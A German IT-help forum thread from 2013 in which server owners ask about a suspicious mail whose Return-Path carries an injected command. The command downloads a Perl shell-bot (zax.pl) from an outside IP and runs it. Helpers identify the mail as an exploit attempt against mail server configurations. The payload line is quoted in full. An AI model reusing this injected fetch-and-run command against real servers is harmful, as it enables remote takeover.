|
Alles rund um Mac OSX & Linux: Seltsame Mail von root, Trojaner zax.pl?Windows 7 Für alle Fragen rund um Mac OSX, Linux und andere Unix-Derivate. |
19.06.2013, 07:32 | #1 |
| Seltsame Mail von root, Trojaner zax.pl? Hallo zusammen, ich hatte heute 3 seltsame E-Mail in meinem Account von root. Sie waren alle gleich. Ich kann mir keinen richtigen Reim darauf machen. Ich betreibe einen Server bei 1und1. Habe die Debian Minimalinstallation genommen und einen Mailserver aufgesetzt. Es können nur authentifizierte User E-Mails versenden und auch nur von einer Domain. Hier der Quellcode der Mail: Code:
ATTFilter Return-Path: <"x`wget${IFS}-O${IFS}/tmp/zax.pl${IFS}hxxp://212.30.46.158/zax.pl``perl${IFS}/tmp/zax.pl`"@pacbell.net> Delivered-To: admin@******** Received: by ********.onlinehome-server.info (Postfix) id 142C5513; Wed, 19 Jun 2013 02:16:42 +0200 (CEST) Delivered-To: root@localhost Received: from domain.local (unknown [212.30.46.158]) by ********.onlinehome-server.info (Postfix) with ESMTP id D394CE7 for <root@localhost>; Wed, 19 Jun 2013 02:16:41 +0200 (CEST) X-Antivirus: avast! (VPS 130618-0, 18.06.2013), Inbound message X-Antivirus-Status: Clean x Grüße, Andreas |
19.06.2013, 08:45 | #2 |
/// Helfer-Team | Seltsame Mail von root, Trojaner zax.pl?wenn du an dieser Adresse eMails empfaengst, bekommst du auch welche Es wird Milliarden an SPAM jede Stunde verschickt, oft auch einfach an standard Mail-Adressen wie admin@ info@ webmaster@ etc. pp. Nichts ungewehnliches also.
__________________ |
19.06.2013, 08:52 | #3 |
| Seltsame Mail von root, Trojaner zax.pl? Ok danke für die Information. Dann bin ich ja beruhigt.
__________________Mit der Mail wird anscheindend irgendwie versucht ein externes Script zu starten, die Befehle stehen im Return-Path. Dadurch dachte ich gleich an eine Sicherheitslücke. |
19.06.2013, 08:56 | #4 |
/// Helfer-Team | Seltsame Mail von root, Trojaner zax.pl? Das sehe ich auch so. Es wird offensichtlich versucht ein Exploit auszunutzen umd den Server zu übernehmen. |
19.06.2013, 09:01 | #5 |
| Seltsame Mail von root, Trojaner zax.pl? Ich hab zu dem Script gegoogelt, aber nix gefunden. Wäre interessant zu wissen, bei welchen Umständen dieser Exploit greift. Allerdings scheint das Script auch schon etwas älter zu sein. Habe mir mal die zax.pl Datei runtergeladen und im Header steht: Code:
ATTFilter #!/usr/bin/perl #################################################### # Hawker Hunter v2.0 (ARZ Co. Ltd.) Legacy 2009(c) # #################################################### |
19.06.2013, 10:48 | #6 | |
/// Winkelfunktion /// TB-Süch-Tiger™ | Seltsame Mail von root, Trojaner zax.pl?Zitat:
Wenn ich mir deinen geposteten Link im Firefox anschaue, seh ich das Script selbst. Aber da wird nix ausgeführt
__________________ --> Seltsame Mail von root, Trojaner zax.pl? |
20.06.2013, 13:07 | #7 |
| Seltsame Mail von root, Trojaner zax.pl? Hallo, Das Thema hat mich jetzt hierher gebracht. Also ich habe die gleiche E-Mail gestern erhalten. Auch hier hat mein Server mir diese E-Mail an meinen PLESK-Admin-Kontakt zugeschickt. Allerdings wie? Mein Server ist 1 Monat alt und aktuell nur zum testen von PLESK 11.0.9#53. Ich habe zwar drei Domains eingerichtet, aber diese haben keinen Inhalt. Das Plesk-Panel selbst ist mit einer zusätzlichen htaccess geschützt und der Server hat nur Zugriff per "Private key file". Heißt jede andere Form der Anmeldung ist gesperrt. Auch der FTP ist deaktiviert. Wieso habe ich also von meinem Server solch eine E-Mail erhalten? |
20.06.2013, 13:47 | #8 | |
/// Winkelfunktion /// TB-Süch-Tiger™ | Seltsame Mail von root, Trojaner zax.pl?Zitat:
__________________ Logfiles bitte immer in CODE-Tags posten |
20.06.2013, 13:52 | #9 | ||
| Seltsame Mail von root, Trojaner zax.pl? Die E-Mail schaute so aus: Zitat:
Zitat:
|
20.06.2013, 14:08 | #10 | ||
/// Winkelfunktion /// TB-Süch-Tiger™ | Seltsame Mail von root, Trojaner zax.pl?Zitat:
Zitat:
__________________ Logfiles bitte immer in CODE-Tags posten |
20.06.2013, 14:16 | #11 | |
/// Winkelfunktion /// TB-Süch-Tiger™ | Seltsame Mail von root, Trojaner zax.pl? Nachtrag: hiermal ein Artikel den ich gefunden habe => Vom Advisory zum Exploit binnen eines Tages - Aus dem Leben eines Szlauszafs Zitat:
__________________ Logfiles bitte immer in CODE-Tags posten |
20.06.2013, 16:00 | #12 |
| Seltsame Mail von root, Trojaner zax.pl? Wow! Danke schön! Zum Glück habe ich weder Exim, noch Dovecot. ^^° Man hat mir erklärt und auch gezeigt dass derjenige wohl über telnet, einfach an "postmaster", gesendet hat, welches dann an meine Admin-Adresse weiterleitet. Danke, damit wäre das geklärt. |
20.06.2013, 17:40 | #13 | ||
/// Winkelfunktion /// TB-Süch-Tiger™ | Seltsame Mail von root, Trojaner zax.pl?Zitat:
Zitat:
Diese Mail war "einfach" nur ein Versuch eine unsichere Konfig auszunutzen, hätte ich mir mal eher den returnpath angeschaut wäre ich auch eher drauf gekommen, ich kann mir kaum vorstellen, dass jmd so ein Shellscript absichtlich selbst ausführt
__________________ Logfiles bitte immer in CODE-Tags posten |
20.06.2013, 18:02 | #14 |
| Seltsame Mail von root, Trojaner zax.pl? Der Script hat scheint was an einen IRC Server zu schicken. |
20.06.2013, 18:06 | #15 |
/// Winkelfunktion /// TB-Süch-Tiger™ | Seltsame Mail von root, Trojaner zax.pl? Wird ja auch als Shell-Bot klassifiziert
__________________ Logfiles bitte immer in CODE-Tags posten |
Themen zu Seltsame Mail von root, Trojaner zax.pl? |
212.30.46.158, account, admin, adresse, avast, browser, debian, e-mail, fix, hallo zusammen, heute, linux, mail, mailserver, melde, meldet, quellcode, scan, scanner, seltsame, server, trojaner, versenden, virenscan, virenscanner, windows, zax.pl, zusammen |